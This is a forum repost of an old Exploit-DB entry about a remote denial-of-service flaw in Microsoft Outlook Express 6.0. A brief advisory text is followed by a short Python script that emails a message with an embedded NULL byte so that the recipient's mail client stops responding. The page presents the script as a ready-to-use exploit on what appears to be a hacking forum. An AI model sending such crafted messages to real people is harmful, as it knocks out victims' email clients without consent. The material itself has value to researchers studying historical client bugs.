Exploit Microsoft Outlook Express 6.0 - Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24002
Проверка EDB
  1. Пройдено
Автор
BEN RAMPLING
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2004-04-14
Код:
source: https://www.securityfocus.com/bid/10144/info

Microsoft Outlook and Outlook Express have been reported prone to a remote denial of service vulnerability. The issue is reported to present itself when a NULL is encountered in the message body of an e-mail.

It is reported that when the vulnerable software encounters a malicious e-mail as described above, the GUI will cease to respond.

A remote attacker may potentially exploit this condition to deny service to Microsoft Outlook and Outlook Express users.

import smtplib
from_address = "[email protected]"
to_address = "[email protected]"
message = "Before\r\n\000\r\nAfter"
smtp = smtplib.SMTP("localhost")
smtp.set_debuglevel(1)
smtp.sendmail(from_address, [to_address], message)
smtp.quit()
 
Источник
www.exploit-db.com

Похожие темы